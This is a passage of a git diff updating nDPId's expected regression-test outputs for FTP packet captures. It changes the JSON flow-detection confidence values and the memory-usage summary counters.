@@ -4,8 +4,8 @@ 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383123629078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFOAAs3ocAAP8GetIK7hokCtwyTPKMABUzQlCKAAAAAGACIACjMgAAAgQCAAAA"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383123629078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD8G378K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383123629078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD0G4b8K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"} -00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} +00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","packets-captured":51,"packets-processed":51,"total-skipped-flows":0,"total-l4-payload-len":4690,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1383123629412} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 51/51 
@@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872970 bytes -~~ total memory freed........: 5872970 bytes -~~ total allocations/frees...: 118166/118166 +~~ total memory allocated....: 6006604 bytes +~~ total memory freed........: 6006604 bytes +~~ total allocations/frees...: 120928/120928 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 821 chars diff --git a/test/results/ftp.pcap.out b/test/results/ftp.pcap.out index 96c000111..32e7bc5fd 100644 --- a/test/results/ftp.pcap.out +++ b/test/results/ftp.pcap.out 
@@ -4,20 +4,20 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1552590234892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590234892,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYGABWjI5ftAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eYmQAAAAAEAgAA"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1552590234919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590234919,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1AAVxgZYKsHSoyOX7qASqbA+KAAAAgQFrAQCCAoSZ\/tNO1eYmQEDAw4="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1552590234919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590234919,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYGABWjI5fuWCrB04AQECxjbgAAAQEICjtXmLQSZ\/tN"} -00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}} +00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590236580,"flow_last_seen":1552590236580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590236580,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1552590236580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590236580,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYHZFXuwKKMAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1efIQAAAAAEAgAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1552590236608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590236608,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1GRVxgdmK2Nw7sCijaASqbDL3QAAAgQFrAQCCAoSZ\/zzO1efIQEDAw4="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1552590236608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590236608,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYHZFXuwKKNZitjcYAQECxjbgAAAQEICjtXnzkSZ\/zz"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"thread_ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"thread_ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590241545,"flow_last_seen":1552590241545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590241545,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1552590241545,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590241545,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYIX8sNBxpOAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eyYgAAAAAEAgAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1552590241573,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590241573,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1F\/LxggMTnkwDQcaT6ASqbBmYgAAAgQFrAQCCAoSaAHMO1eyYgEDAw4="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1552590241573,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590241573,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYIX8sNBxpPDE55MYAQECxjbgAAAQEICjtXsn0SaAHM"} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":100,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1552590241545,"flow_last_seen":1552590241639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":24480,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1552590241639,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00640{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1115,"flow_first_seen":1552590241545,"flow_last_seen":1552590241878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1048576,"flow_avg_l4_payload_len":940,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 
-00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} +00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 
+00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","packets-captured":1192,"packets-processed":1192,"total-skipped-flows":0,"total-l4-payload-len":1050844,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1552590243371} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1192/1192 
@@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5912294 bytes -~~ total memory freed........: 5912294 bytes -~~ total allocations/frees...: 119318/119318 +~~ total memory allocated....: 6045940 bytes +~~ total memory freed........: 6045940 bytes +~~ total allocations/frees...: 122080/122080 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 826 chars diff --git a/test/results/ftp_failed.pcap.out b/test/results/ftp_failed.pcap.out index 466d47d57..fc69f88d9 100644 --- a/test/results/ftp_failed.pcap.out +++ b/test/results/ftp_failed.pcap.out 
@@ -4,8 +4,8 @@ 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574361625864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625864,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACgGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbUAAAAAoAJwgHzLAAACBAWgBAIICpYFXqIAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574361625878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625878,"pkt":"ZABqYzXM9LUv\/K\/wht1gC1mOACgGOioACAAQEAAAAAAAAAAAAAEqAA1AAAEAAwGSABIBkwARABWutHAVBmyZN0G2oBL\/\/zbpAAACBAWgBAIIClbTSMOWBV6iAQMDDg=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574361625878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1574361625878,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACAGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbZwFQZtgBAA4XzDAAABAQgKlgVesFbTSMM="} 
-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1574361625864,"flow_last_seen":1574361631296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1574361631296,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 
+00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1574361625864,"flow_last_seen":1574361631296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1574361631296,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":18,"total-skipped-flows":0,"total-l4-payload-len":136,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1574361633102} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 18/18 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872032 bytes -~~ total memory freed........: 5872032 bytes -~~ total allocations/frees...: 118134/118134 +~~ total memory allocated....: 6005674 bytes +~~ total memory freed........: 6005674 bytes +~~ total allocations/frees...: 120896/120896 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 837 chars diff --git 